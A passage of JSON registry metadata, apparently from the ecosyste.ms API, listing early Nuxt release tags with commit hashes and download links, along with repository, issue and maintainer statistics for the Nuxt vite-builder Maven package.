epositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.058Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.979943940947386,"dependent_packages_count":31.998402898858956,"stargazers_count":0.39947592610798893,"forks_count":1.7237055154162395,"average":16.525382070332643},"purl":"pkg:maven/org.webjars.npm/nuxt__vite-builder","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.npm:nuxt__vite-builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.npm:nuxt__vite-builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.npm:nuxt__vite-builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:nuxt__vite-builder/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14148757,"name":"org.mvnpm.at.nuxt:vite-builder","ecosystem":"maven","description":"Vite bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.mvnpm.at.nuxt","versions_count":1,"first_release_published_at":"2026-03-30T01:36:51.000Z","latest_release_published_at":"2026-03-30T01:36:51.000Z","latest_release_number":"4.4.2","last_synced_at":"2026-05-11T01:23:07.170Z","created_at":"2026-03-30T02:00:34.303Z","updated_at":"2026-05-11T01:23:07.170Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.nuxt/vite-builder/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.nuxt/vite-builder/","metadata":{},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-03-27T22:54:07.000Z","size":135561,"stargazers_count":59951,"open_issues_count":922,"forks_count":5578,"subscribers_count":781,"default_branch":"main","last_synced_at":"2026-03-27T22:58:53.593Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-03-27T22:36:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"h